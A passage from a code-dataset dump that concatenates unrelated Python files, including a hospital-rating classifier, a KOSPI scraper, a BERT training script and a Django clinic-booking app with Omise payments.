\n","sub_path":"embedding/CdIM_prototype/points/versus_3d.py","file_name":"versus_3d.py","file_ext":"py","file_size_in_byte":7334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"631315419","text":"# プログラム2.2\n\nget_ipython().system('pip3 install category_encoders')\nimport pandas as pd\n# category_encodersをインポート\nimport category_encoders as cate_enc\n# ニューラルネットワークのクラスをインポート\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import train_test_split\n\n# データの準備\ndef prepare():\n #!kaggle datasets download -d cms/hospital-general-information\n get_ipython().system('unzip hospital-general-information.zip')\n\ndef preprocess():\n df = pd.read_csv('HospInfo.csv')\n print(df)\n print(df)\n # 病院のデータ\n features = ['City', 'State',\n 'County Name', 'Hospital Type',\n 'Emergency Services', \n 'Meets criteria for meaningful use of EHRs',\n 'Mortality national comparison', \n 'Safety of care national comparison',\n 'Readmission national comparison', \n 'Patient experience national comparison',\n 'Effectiveness of care national comparison', \n 'Timeliness of care national comparison',\n 'Efficient use of medical imaging national comparison']\n ignores = []\n for f in df.columns.values:\n if not f in features: \n ignores.append(f)\n ignores.remove('Hospital overall rating')\n ratings = ['1', '2', '3', '4', '5']\n mp = {'1':0, '2':1, '3':2, '4':3, '5':4}\n df = df[df['Hospital overall rating'].isin(ratings)]\n df['Hospital overall rating'].replace(mp, inplace=True)\n df.drop(ignores, axis=1, inplace=True)\n # One-hotエンコーディング\n ohe = cate_enc.OneHotEncoder(cols=features, handle_unknown='impute')\n ndf = ohe.fit_transform(df)\n # 病院の評価を予測対象とする\n y = ndf.loc[:,['Hospital overall rating']].values.ravel()\n ndf.drop(columns=['Hospital overall rating'], inplace=True)\n return ndf, y, ratings\n\ndef main():\n prepare()\n ndf, y, ratings = preprocess()\n # One-hotエンコーディング結果の確認\n print(ndf.loc[:,ndf.columns.values[:5]].head())\n print(ndf.loc[:,ndf.columns.values[3565:3570]].head())\n # テストデータと学習データに分割して\n # ニューラルネットワークによるratingの学習と予測\n X = ndf.loc[:,ndf.columns.values].values\n X_tr, X_te, y_tr, y_te = train_test_split(X, y, random_state=0, train_size=0.7)\n clf = MLPClassifier(solver='adam', alpha=1e-5, \n hidden_layer_sizes=(100,), \n activation='tanh',\n random_state=1, max_iter=3000)\n clf.fit(X_tr, y_tr)\n y_pre = clf.predict(X_te)\n print(classification_report(y_te, y_pre, target_names=ratings, zero_division=1))\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"py/prog2-02.py","file_name":"prog2-02.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"168421399","text":"\"\"\"\nSzymon's Chomej\nfavourite song parameters\n\"\"\"\nartist = \"Kwiat Jabłoni\" #Best Polish band :)\ntitle = \"Dziś Późno Pójdę Spać\"\ngenre = \"Alternative\"\nalbum = \"Niemożliwe\"\noriginCountry = \"Poland\"\nreleaseYear = 2019\ndurationsInSeconds = 232\nyouTubeViews = 22223205\nmySonLikeIt = True\n\n\"\"\"\nMy score in scale 1:10. \nWhen 1 is the worst and 10 is the best\n\"\"\"\nmyScore = 9,5\n","sub_path":"Kurs Pirple/Homeworks/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"299025378","text":"#!/usr/bin/env python3\n \nimport pandas as pd\nimport csv\n\n# leer el csv\ndata = pd.read_csv(\"df_data.csv\")\n# make new csv with wanted results\narr_data = open(\"arr_data.csv\", \"w\")\n\n# to show the fields that are important to you\n# as admin, it supposedly lets you download a csv with the issue key so it's just adding it in the columns to show\ndf = pd.DataFrame(data, columns= ['Summary','Issue Type','Client','Project','Role Title','Role ID','POC','Resource Start Date','Role Created Date','Resource End Date'])\n\n# show everything \npd.set_option('display.max_columns', None)\npd.set_option('display.max_rows', 10)\n\n#print result\nprint(df)\nprint (df, file=arr_data)\narr_data.close()\n","sub_path":"arrange.py","file_name":"arrange.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"61451549","text":"\n\n#calss header\nclass _COMPARATIVE():\n\tdef __init__(self,): \n\t\tself.name = \"COMPARATIVE\"\n\t\tself.definitions = [u'the form of an adjective or adverb that expresses a difference in amount, number, degree, or quality: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_comparative.py","file_name":"_comparative.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"557899432","text":"# kospi 체결가를 page별로 받아서 line chart 그리기\n# https://finance.naver.com/sise/sise_index_day.nhn?code=KOSPI&page=1\n\nfrom bs4 import BeautifulSoup\nimport requests as req\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\ncode = \"KOSPI\"\n\ndef get_data(page_num):\n uri = \"https://finance.naver.com/sise/sise_index_day.nhn?code={}&page={}\".format(code, page_num)\n response = req.get(uri)\n if response.status_code == 200:\n html = response.text\n soup = BeautifulSoup(html, 'html.parser')\n # tr_tag = soup.find_all(\"tr\")\n date_data = soup.find_all(\"td\", class_ = \"date\")\n date_array = [date.get_text(strip = True) for date in date_data]\n number1_data = soup.find_all(\"td\", class_ = \"number_1\")\n number1_array = [number1.get_text(strip = True) for number1 in number1_data]\n\n np_date_array = np.array(date_array)\n np_number1_array = np.array(number1_array).reshape(6, 4)\n data = pd.DataFrame(np_number1_array, columns = [\"1\", \"2\", \"3\", \"4\"], index = np_date_array)\n data[\"1\"] = [float(item1.replace(\",\", \"\")) for item1 in data[\"1\"]]\n data[\"3\"] = [float(item1.replace(\",\", \"\")) for item1 in data[\"3\"]]\n return data\n else:\n raise Exception('error')\n \ndef get_all_pages(page):\n result_pd = None\n for page in range(1, 3):\n res = get_data(page)\n if result_pd is None: result_pd = res\n else: result_pd = result_pd.append(res)\n return result_pd\n\ndata = get_all_pages(3)\ndata.sort_index(inplace=True)\n\nplt.subplot(211)\nplt.plot(data.index, data[\"1\"])\nplt.xticks(rotation=30)\nplt.title(\"price\")\nplt.grid()\n\nplt.subplot(212)\nplt.bar(data.index, data[\"3\"])\nplt.xticks(rotation=30)\nplt.title(\"mount\")\nplt.grid()\n\nplt.show()\n\n\n\n\n","sub_path":"pandas/3_homework.py","file_name":"3_homework.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"53504191","text":"class Solution(object):\n def minPathSum(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n # if not grid: return 0\n # x, y = len(grid[0]), len(grid)\n # for i in range(1, x):\n # grid[0][i] = grid[0][i-1] + grid[0][i]\n # for j in range(1, y):\n # grid[j][0] = grid[j-1][0] + grid[j][0]\n # for j in range(1, y):\n # for i in range(1, x):\n # grid[j][i] = min(grid[j-1][i], grid[j][i-1]) + grid[j][i]\n # return grid[-1][-1]\n\n # dp[0] = dp[0] + i[0]\n # for i in 1->l\n # return dp[-1]\n dp = [0]+[float('inf')]*len(grid[0])\n for i in grid:\n for j in range(len(grid[0])):\n dp[j] = min(dp[j-1], dp[j]) + i[j]\n return dp[-2]","sub_path":"Algorithms/Minimum Path Sum/Minimum Path Sum.py","file_name":"Minimum Path Sum.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"637163151","text":"from torch import nn\nimport torch.nn.functional as F\nfrom pytorch_pretrained_bert.modeling import BertModel, BertPreTrainedModel\nfrom pytorch_pretrained_bert.optimization import BertAdam\nimport torch.optim as optim\nimport torch, os\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else 'cpu')\n# 定义模型\nclass BertClassification(BertPreTrainedModel):\n def __init__(self, config):\n super(BertClassification,self).__init__(config)\n self.num_labels = 2\n self.bert = BertModel(config)\n self.dropout = nn.Dropout(0.5)\n self.fc = nn.Linear(config.hidden_size, 2)\n self.apply(self.init_bert_weights)\n\n def forward(self, input_ids, input_mask, label_ids):\n _,pooled_output = self.bert(input_ids,None,input_mask,output_all_encoded_layers=False)\n pooled_output = self.dropout(pooled_output)\n logits = self.fc(pooled_output)\n if label_ids is not None:\n loss_fct = F.cross_entropy()\n return loss_fct(logits.view(-1,self.num_labels),label_ids.view(-1))\n return logits\n\n\ndef berttrain(train_iter, dev_iter, num_train_steps, model, args):\n \n optimizer = BertAdam(model.parameters(), lr=2e-5, schedule='warmup_linear', warmup=0.1, t_total=num_train_steps)\n\n best_acc = 0\n steps = 0\n last_step = 0\n model = model.to(device)\n model.train()\n print('training...')\n for epoch in range(args.bert_epochs):\n for batch in train_iter:\n feature, target, mask = batch[1], batch[0], batch[2] #(W,N) (N)\n feature = feature.to(device)\n target = target.to(device)\n mask = mask.to(device)\n # 清除梯度\n optimizer.zero_grad()\n output = model(feature, mask, None)\n loss = F.cross_entropy(output, target)\n loss.backward()\n optimizer.step()\n \n steps += 1\n if steps % 10 == 0:\n result = torch.max(output,1)[1].view(target.size())\n corrects = (result.data == target.data).sum()\n accuracy = corrects*100.0/len(batch[0])\n print('\\rBatch[{}] - loss: {:.6f} acc: {:.4f}'.format(\n steps, loss.data.item(), accuracy))\n\n if steps % 200 == 0:\n save(model,args.save_dir,'snapshot',steps)\n dev_acc = eval(dev_iter, model, args)\n if dev_acc > best_acc:\n best_acc = dev_acc\n last_step = steps\n if args.save_best:\n save(model,args.save_dir,'best',steps)\n\n\ndef save(model, save_dir, save_prefix, steps):\n if not os.path.isdir(save_dir):\n os.makedirs(save_dir)\n save_prefix = os.path.join(save_dir,save_prefix)\n save_path = '{}_steps_{}.pt'.format(save_prefix,steps)\n torch.save(model.state_dict(),save_path)\n\ndef eval(data_iter, model, args):\n model.eval()\n corrects, avg_loss = 0,0\n for batch in data_iter:\n feature, target, mask = batch[1], batch[0], batch[2] #(W,N) (N)\n feature = feature.to(device)\n target = target.to(device)\n mask = mask.to(device)\n logit = model(feature, mask, None)\n loss = F.cross_entropy(logit,target)\n \n avg_loss += loss.data\n result = torch.max(logit,1)[1]\n corrects += (result.view(target.size()).data == target.data).sum()\n \n size = len(data_iter.dataset)\n avg_loss /= size \n accuracy = 100.0 * corrects/size\n print('\\nEvaluation - loss: {:.6f} acc: {:.4f} \\n'.format(avg_loss, accuracy))\n \n return accuracy\n\n","sub_path":"distill_test/Berttrain.py","file_name":"Berttrain.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"597714937","text":"from django.shortcuts import render\nfrom django.http import HttpRequest, Http404, JsonResponse\nfrom django.core.exceptions import PermissionDenied\nfrom django.shortcuts import redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom datetime import datetime\nfrom django.template.defaulttags import register\nfrom html_json_forms import parse_json_form\nfrom bson.objectid import ObjectId\nimport re\nimport json\n# Create your views here.\nfrom .API.API import API\napi = API()\n\nimport omise\n\ntry:\n from config import OMISE_SECRET_KEY, OMISE_PUBLIC_KEY, OMISE_API_VERSION\nexcept ImportError:\n pass\n\n\nomise.api_secret = OMISE_SECRET_KEY\nomise.api_public = OMISE_PUBLIC_KEY\nomise.api_version = OMISE_API_VERSION\n\nblood_abo = ['-', 'A', 'B', 'O', 'AB']\nblood_rh = ['', 'RH-', 'RH+']\n\n@register.filter\ndef get_item(dictionary, key):\n return dictionary.get(key)\n\ndef check_logged_in(request):\n return 'user' in request.session and request.session['user'].get('is_authenticated')\n\ndef home(request):\n \"\"\"Renders the home page.\"\"\"\n assert isinstance(request, HttpRequest)\n return redirect('/departments')\n\ndef check_user_information(request):\n return JsonResponse({'hasInfo': api.get_patient_id(request.GET.get('username'))[0]})\n\ndef departments(request):\n \"\"\"Renders the about page.\"\"\"\n if 'selected_package' in request.session:\n del request.session['selected_package']\n assert isinstance(request, HttpRequest)\n status, result = api.show_departments()\n return render(\n request,\n 'app/departments.html',\n {\n 'title': 'แผนกและแพ็คเกจ',\n 'departments': result,\n 'logged_user': request.session.get('user')\n }\n )\n\n@login_required(login_url='/accounts/login')\ndef about(request):\n \"\"\"Renders the about page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/about.html',\n {\n 'title': 'About',\n 'message': 'Your application description page.',\n 'year': datetime.now().year,\n 'logged_user': request.session.get('user')\n }\n )\n\ndef contact(request):\n if not check_logged_in(request):\n return redirect('/login/?next=/contact/')\n \"\"\"Renders the contact page.\"\"\"\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/contact.html',\n {\n 'title': 'Contact',\n 'message': 'Your contact page.',\n 'year': datetime.now().year,\n 'logged_user': request.session.get('user')\n }\n )\n\ndef check_reserved_time(request):\n doctor = api.show_doctor_detail(request.session['selected_doctor'])[1]\n free = True\n for reservation in doctor['reserved']:\n if reservation.hour == int(request.GET.get('hour')) and reservation.day == int(request.GET.get('day')) and reservation.month == int(request.GET.get('month')) and reservation.year == int(request.GET.get('year')):\n free = False\n break\n return JsonResponse({'free': free})\n\n@login_required(login_url='/accounts/login')\ndef doctor_detail(request):\n \"\"\"Renders the about page.\"\"\"\n if 'selected_package' not in request.session or 'selected_doctor' not in request.session:\n return redirect('/doctor-search')\n if request.method == 'POST':\n request.session['selected_date'] = json.loads(request.POST['date'])\n return redirect('/confirm/')\n assert isinstance(request, HttpRequest)\n status, doctor = api.show_doctor_detail(request.session['selected_doctor'])\n if status:\n status, package = api.show_special_package_info(\n request.session['selected_package'])\n working_times = {}\n for day in doctor['working_time']:\n if doctor['working_time'][day] != []:\n working_times[day] = []\n for time in doctor['working_time'][day]:\n for i in range(int(time['start']), int(time['finish'])):\n working_times[day].append(\n {'start': i, 'finish': i + 1})\n # print(working_times)\n return render(\n request,\n 'app/doctor-detail.html',\n {\n 'title': 'ข้อมูลแพทย์',\n 'doctor': doctor,\n 'selected_package': package,\n 'working_time': working_times,\n 'logged_user': request.session.get('user')\n }\n )\n else:\n raise Http404(\"No doctor found\")\n\n@login_required(login_url='/accounts/login')\ndef doctor_profile(request):\n \"\"\"Renders the about page.\"\"\"\n if not check_user_group('doctor', request.user):\n raise PermissionDenied\n doctor_id = api.get_doctor_id(request.user.username)[1]\n status, doctor = api.show_doctor_detail(doctor_id)\n status, orders = api.get_doctor_orders(doctor_id)\n return render(\n request,\n 'app/doctor-profile.html',\n {\n 'title': 'ข้อมูลแพทย์',\n 'doctor': doctor,\n 'orders': orders,\n }\n )\n\n@login_required(login_url='/accounts/login')\ndef member(request):\n global blood_abo, blood_rh\n assert isinstance(request, HttpRequest)\n if not api.get_patient_id(request.user.username)[0] or len(request.user.groups.all()) > 0:\n return redirect('/register')\n status, patient_id = api.get_patient_id(request.user.username)\n status, member_detail = api.get_patient_detail(patient_id)\n status, orders = api.get_patient_orders(request.user.username)\n return render(\n request,\n 'app/member.html',\n {\n 'title': 'ข้อมูลสมาชิก',\n 'member_detail': member_detail,\n 'orders': orders,\n 'logged_user': request.user.username\n }\n )\n\n@login_required(login_url='/accounts/login')\ndef treat(request, order_id):\n if not check_user_group('doctor', request.user):\n raise PermissionDenied\n global blood_abo, blood_rh\n if request.method == 'POST':\n status, result = api.insert_note(order_id, request.POST.get('treating-detail'))\n if status:\n return redirect('/doctor-profile')\n assert isinstance(request, HttpRequest)\n order_detail = api.get_order_detail(order_id)[1]\n status, patient_detail = api.get_patient_detail(order_detail['patient_id'])\n # member_detail['blood_group_abo'] = blood_abo[member_detail['blood_group_abo']]\n # member_detail['blood_group_rh'] = blood_rh[member_detail['blood_group_rh']]\n return render(\n request,\n 'app/member-profile.html',\n {\n 'title': 'การรักษา',\n 'member_detail': patient_detail,\n 'note': order_detail['note']\n }\n )\n\n@login_required(login_url='/accounts/login')\ndef edit_member_info(request):\n if len(request.user.groups.all()) > 0 :\n raise PermissionDenied\n elif not api.get_patient_id(request.user.username)[0]:\n return redirect('/register')\n assert isinstance(request, HttpRequest)\n if request.method == 'POST':\n email = request.POST['email']\n # status = request.POST['status']\n telephone_number = request.POST['telephone_number']\n emergency_phone = request.POST['emergency_phone']\n status, patient_id = api.get_patient_id(request.user.username)\n status, member_detail = api.get_patient_detail(patient_id)\n\n # เอาค่า email, status ..... เอาไปใส่ใน field ของ dict member_detail แล้วเอา member_detail แต่ละ field ไปแทนใน paramenter ใน function ข้างล่าง\n member_detail['email'] = email\n # member_detail['status'] = status\n member_detail['blood_group_rh'] = 'none' if member_detail['blood_group_rh'] in [None, 'None'] else member_detail['blood_group_rh']\n member_detail['blood_group_abo'] = 'none' if member_detail['blood_group_abo'] in [None, 'None'] else member_detail['blood_group_abo']\n member_detail['status'] = 'none' if member_detail['status'] in [None, 'None'] else member_detail['status']\n member_detail['telephone_number'] = telephone_number\n member_detail['emergency_phone'] = emergency_phone\n # print(member_detail)\n # member_detail['birthday'] = {'day': member_detail['birthday'].day, 'month': member_detail['birthday'].month, 'year': member_detail['birthday'].year}\n query_status, result = api.update_patient(patient_id, member_detail)\n if query_status:\n return redirect('..')\n blood_abo = ['-', 'A', 'B', 'O', 'AB']\n blood_rh = ['', 'RH-', 'RH+']\n status, patient_id = api.get_patient_id(request.user.username)\n status, member_detail = api.get_patient_detail(patient_id)\n # member_detail['gender'] = 'ชาย' if member_detail['gender'] else 'หญิง'\n # member_detail['blood_group_abo'] = blood_abo[member_detail['blood_group_abo']]\n # member_detail['blood_group_rh'] = blood_rh[member_detail['blood_group_rh']]\n birthday_list = str(member_detail['birthday']).split('-')\n member_detail['birthday'] = {'day': birthday_list[2], 'month': birthday_list[1], 'year': birthday_list[0]}\n member_detail['congenital_disease'] = ', '.join(member_detail['congenital_disease']) if type(member_detail['congenital_disease']) == type([]) else ''\n return render(\n request,\n 'app/edit-member.html',\n {\n 'title': 'แก้ไขข้อมูลสมาชิก',\n 'member_detail': member_detail,\n 'logged_user': request.user.username\n }\n )\n\n\ndef regular_packages(request):\n \"\"\"Renders the about page.\"\"\"\n if request.method == 'POST':\n request.session['selected_package'] = request.POST['package']\n return redirect('/doctor-search/')\n assert isinstance(request, HttpRequest)\n status, result = api.show_general_list()\n return render(\n request,\n 'app/regular-package.html',\n {\n 'title': 'ตรวจสุขภาพทั่วไป',\n 'packages': result,\n 'logged_user': request.session.get('user')\n }\n )\n\n\ndef special_packages(request, package_id):\n \"\"\"Renders the about page.\"\"\"\n assert isinstance(request, HttpRequest)\n if request.method == 'POST':\n request.session['selected_package'] = request.POST['package']\n return redirect('/doctor-search/')\n status, result = api.show_special_package_info(package_id)\n # print(result)\n return render(\n request,\n 'app/special_packages.html',\n {\n 'title': 'รายละเอียดแพ็คเกจ',\n 'package': result,\n 'package_id': package_id,\n 'logged_user': request.session.get('user')\n }\n )\n\n@login_required(login_url='/accounts/login')\ndef search_for_doctor(request):\n \"\"\"Renders the about page.\"\"\"\n if 'selected_package' not in request.session:\n return redirect('/departments/')\n if request.method == 'POST':\n request.session['selected_doctor'] = request.POST['doctor_id']\n return redirect('/doctor-detail/')\n # print(request.session['selected_package'])\n assert isinstance(request, HttpRequest)\n return render(\n request,\n 'app/doctor-search.html',\n {\n 'title': 'ค้นหาแพทย์',\n 'logged_user': request.session.get('user')\n }\n )\n\n@login_required(login_url='/accounts/login')\ndef doctor_search_api(request):\n package_id = request.session['selected_package']\n days = request.GET.get('days').split(\n ',') if request.GET.get('days') != None else None\n time = request.GET.get('time')\n # print(time)\n doctor_firstname = request.GET.get('doctor_firstname')\n doctor_lastname = request.GET.get('doctor_surname')\n gender = request.GET.get('gender')\n status, result = api.find_doctors(\n package_id, days, time, doctor_firstname, doctor_lastname, gender)\n return JsonResponse({'status': status, 'result': result})\n\n@login_required(login_url='/accounts/login')\ndef doctor_auto_search_api(request):\n package_id = request.session['selected_package']\n status, result = api.auto_find_doctors(package_id)\n return JsonResponse({'status': status, 'result': result})\n\n\ndef doctor(request):\n \"\"\"Renders the about page.\"\"\"\n assert isinstance(request, HttpRequest)\n if request.method == 'POST':\n request.session['selected_package'] = request.POST['package_id']\n request.session['selected_doctor'] = request.POST['doctor_id']\n return redirect('/doctor-detail/')\n status, result = api.show_doctor_in_department()\n # print(result)\n return render(\n request,\n 'app/doctor.html',\n {\n 'title': 'แผนกและแพทย์',\n 'departments': result,\n 'logged_user': request.session.get('user')\n }\n )\n\n@login_required(login_url='/accounts/login')\ndef confirm(request):\n \"\"\"Renders the about page.\"\"\"\n assert isinstance(request, HttpRequest)\n if len(request.user.groups.all()) > 0:\n raise PermissionDenied\n elif not api.get_patient_id(request.user.username)[0]:\n return redirect('/register')\n if 'selected_package' not in request.session or 'selected_doctor' not in request.session or 'selected_date' not in request.session:\n return redirect('/doctor-detail/')\n if request.method == 'POST':\n return redirect('/payment')\n # print(request.session['selected_date'])\n status, package = api.show_special_package_info(\n request.session['selected_package'])\n status, doctor = api.show_doctor_detail(request.session['selected_doctor'])\n month = [\n 'มกราคม',\n 'กุมภาพันธ์',\n 'มีนาคม',\n 'เมษายน',\n 'พฤษภาคม',\n 'มิถุนายน',\n 'กรกฎาคม',\n 'สิงหาคม',\n 'กันยายน',\n 'ตุลาคม',\n 'พฤศจิกายน',\n 'ธันวาคม',\n ]\n return render(\n request,\n 'app/confirm.html',\n {\n 'title': 'ยืนยันแพ็คเกจ',\n 'selected_package': package,\n 'selected_doctor': doctor,\n 'selected_date': request.session['selected_date']['date'],\n 'selected_month': month[request.session['selected_date']['month'] - 1],\n 'selected_year': request.session['selected_date']['year'],\n 'selected_start_hr': request.session['selected_date']['start_hr'],\n 'selected_finish_hr': request.session['selected_date']['finish_hr'],\n 'logged_user': request.user.username\n }\n )\n\n@login_required(login_url='/accounts/login')\ndef payment(request):\n if len(request.user.groups.all()) > 0:\n raise PermissionDenied\n elif not api.get_patient_id(request.user.username)[0]:\n return redirect('/register')\n if 'selected_package' not in request.session or 'selected_doctor' not in request.session or 'selected_date' not in request.session:\n return redirect('/doctor-detail/')\n return render(\n request,\n 'app/payment.html',\n {\n 'title': 'เลือกวิธีชำระค่าบริการ',\n }\n )\n\n\n@login_required(login_url='/accounts/login')\ndef payment_card(request):\n if len(request.user.groups.all()) > 0:\n raise PermissionDenied\n elif not api.get_patient_id(request.user.username)[0]:\n return redirect('/register')\n if 'selected_package' not in request.session or 'selected_doctor' not in request.session or 'selected_date' not in request.session:\n return redirect('/doctor-detail/')\n \"\"\"Renders the about page.\"\"\"\n assert isinstance(request, HttpRequest)\n payment_error = False\n form_error = False\n if request.method == 'POST':\n patient_id = api.get_patient_id(request.user.username)[1]\n patient_detail = api.get_patient_detail(patient_id)[1]\n package_detail = api.show_special_package_info(request.session['selected_package'])[1]\n name = patient_detail['patient_name'] + ' ' + patient_detail['patient_surname']\n number = request.POST.get('cardNumber')\n if len(number) != 16 or not re.search('\\w\\w/\\w\\w', request.POST.get('cardExpiry')) or request.POST.get('cardCVC') == '000':\n form_error = True\n else:\n card_expiration = request.POST.get('cardExpiry').split('/')\n expiration_month = int(card_expiration[0])\n expiration_year = int(str(datetime.now().year)[:2] + card_expiration[1])\n security_code = int(request.POST.get('cardCVC'))\n price = package_detail['package_cost'] * 100\n\n try:\n token = omise.Token.create(\n name=name,\n number=number,\n expiration_month=expiration_month,\n expiration_year=expiration_year,\n security_code=security_code\n )\n\n charge = omise.Charge.create(\n amount=int(price),\n currency=\"thb\",\n card=token.id\n )\n\n\n if charge.paid and charge.authorized and not charge.failure_code:\n status, result = api.create_order(request.session['selected_package'], request.session['selected_doctor'],\n request.user.username, '-', request.session['selected_date'], charge.id)\n if status:\n return redirect(\"/\")\n else:\n payment_error = True\n else:\n payment_error = True\n except Exception:\n payment_error = True\n return render(\n request,\n 'app/payment_card.html',\n {\n 'title': 'ชำระค่าบริการ',\n 'payment_error': payment_error,\n 'form_error': form_error\n }\n )\n\n@login_required(login_url='/accounts/login')\ndef payment_bank(request):\n if len(request.user.groups.all()) > 0:\n raise PermissionDenied\n elif not api.get_patient_id(request.user.username)[0]:\n return redirect('/register')\n if 'selected_package' not in request.session or 'selected_doctor' not in request.session or 'selected_date' not in request.session:\n return redirect('/doctor-detail/')\n if request.method == 'POST':\n package_detail = api.show_special_package_info(request.session['selected_package'])[1]\n price = package_detail['package_cost'] * 100\n bank = request.POST.get('bank')\n source = omise.Source.create(\n amount=int(price),\n currency='thb',\n type=bank\n )\n charge = omise.Charge.create(\n amount=int(price) ,\n currency=\"thb\",\n return_uri= \"http://localhost:8000/payment/bank\",\n source=source.id\n )\n request.session['charge_token'] = charge.id\n return redirect(charge.authorize_uri) \n \n if 'charge_token' in request.session:\n charge = omise.Charge.retrieve(request.session['charge_token'])\n if charge and charge.paid and charge.authorized:\n # print(vars(charge))\n status, result = api.create_order(request.session['selected_package'], request.session['selected_doctor'],\n request.user.username, '-', request.session['selected_date'], charge.id)\n if status:\n del request.session['charge_token']\n return redirect(\"/\")\n\n return render(\n request,\n 'app/payment_bank.html',\n {\n 'title': 'ชำระค่าบริการ',\n }\n )\n\ndef check_user_group(group_name, user):\n groups = user.groups.all()\n print(groups)\n return len(groups) > 0 and groups[0].name == group_name\n\n\n@login_required(login_url='/accounts/login')\ndef admin_mongo(request):\n if not check_user_group('staff', request.user) and not request.user.is_superuser:\n raise PermissionDenied\n assert isinstance(request, HttpRequest)\n status, result = api.get_all_collections_name()\n result.sort()\n return render(\n request,\n 'app/admin_mongo.html',\n {\n 'title': 'mongoDB Admin',\n 'header_title': 'mongoDB Admin',\n 'collections': result,\n 'DATABASE': True,\n 'logo_link': '/admin-mongo',\n 'logged_user': request.session.get('user'),\n 'only_logout': True\n }\n )\n\ndef decode_data(data):\n for k, v in data.items():\n if type(v) == type({}):\n pass\n elif type(v) == type([]):\n pass\n else:\n data[k] = api.decode_thai_value(k, v)[1]\n\n\n@login_required(login_url='/accounts/login')\ndef admin_mongo_collection(request, collection_name):\n if not check_user_group('staff', request.user) and not request.user.is_superuser:\n raise PermissionDenied\n assert isinstance(request, HttpRequest)\n permissions = {}\n if request.user.is_superuser:\n permissions = {'insert': 1, 'delete': 1, 'update': 1}\n else:\n permissions['insert'] = 1 if api.get_collection_permission(collection_name, 'insert')[0] else 0\n permissions['delete'] = 1 if api.get_collection_permission(collection_name, 'delete')[0] else 0\n permissions['update'] = 1 if api.get_collection_permission(collection_name, 'update')[0] else 0\n # print(collection_name)\n # print(permissions)\n status, data = api.admin_get_all_documents(collection_name)\n result = []\n for doc in data:\n tmp = {}\n for k, v in doc.items():\n if k == '_id':\n k = 'object_id'\n tmp[k] = v\n decode_data(tmp)\n result.append(tmp)\n return render(\n request,\n 'app/admin_mongo.html',\n {\n 'title': 'mongoDB Admin',\n 'header_title': 'mongoDB Admin',\n 'collection_name': collection_name,\n 'permissions': permissions,\n 'data': result,\n 'COLLECTION': True,\n 'toolbar': True,\n 'logo_link': '/staff',\n 'logged_user': request.session.get('user'),\n 'only_logout': True\n }\n )\n\ndef clean_field(org, res, name=''):\n for field in org:\n tmp = field['field_name']\n if name != '':\n tmp = '[' + tmp + ']'\n if field['field_type'] == 'dict':\n clean_field(field['dict'], res, name + tmp)\n elif field['field_type'] == 'list' and field['value'] == 'dict':\n clean_field(field['dict'], res, name + tmp + '[0]')\n else:\n this_field = {'field_name': name + tmp, 'field_type': field['field_type']}\n if 'value' in field:\n this_field['value'] = field['value']\n res.append(this_field)\n\n@login_required(login_url='/accounts/login')\ndef admin_mongo_add(request, collection_name):\n if not check_user_group('staff', request.user) and not request.user.is_superuser:\n raise PermissionDenied\n if request.method == 'POST':\n tmp = dict(request.POST)\n for key in tmp:\n tmp[key] = tmp[key][0]\n del tmp['csrfmiddlewaretoken']\n # return JsonResponse(parse_json_form(tmp))\n # print(parse_json_form(tmp))\n status, result = api.admin_insert_document(collection_name, parse_json_form(tmp))\n if status:\n return redirect('..')\n else:\n return redirect('.')\n status, fields = api.get_collection_pattern(collection_name)\n found_id = False\n for i in range(len(fields)):\n if fields[i]['field_name'] == '_id':\n found_id = True\n index = i\n break\n if found_id:\n del fields[index]\n # print(fields)\n return render(\n request,\n 'app/admin_mongo-add.html',\n {\n 'title': 'mongoDB Admin',\n 'header_title': 'mongoDB Admin',\n 'collection_name': collection_name,\n 'fields': json.dumps(fields),\n 'logo_link': '/staff',\n 'only_logout': True\n }\n )\n\ndef clean_datatype(data):\n for k, v in data.items():\n if type(v) == type(datetime.now()) or type(v) == type(ObjectId()):\n data[k] = str(v)\n elif type(v) == type({}):\n clean_datatype(data[k])\n elif type(v) == type([]):\n for i in range(len(v)):\n if type(v) == type(datetime.now()) or type(v) == type(ObjectId()):\n data[k] = str(v)\n elif type(v) == type({}):\n clean_datatype(v[i])\n\ndef fill_field(fields, data):\n for field in fields:\n if data == None or data.get(field['field_name']) == None:\n if field['field_type'] == 'dict':\n fill_field(field['dict'], None)\n else:\n data[field['field_name']] = None\n elif field['field_type'] == 'date':\n tmp = data[field['field_name']].split('-')\n data[field['field_name']] = {\n 'year': tmp[0],\n 'month': tmp[1],\n 'day': tmp[2]\n }\n\n@login_required(login_url='/accounts/login')\ndef admin_mongo_edit(request, collection_name, object_id):\n if not check_user_group('staff', request.user) and not request.user.is_superuser:\n raise PermissionDenied\n if request.method == 'POST':\n tmp = dict(request.POST)\n for key in tmp:\n tmp[key] = 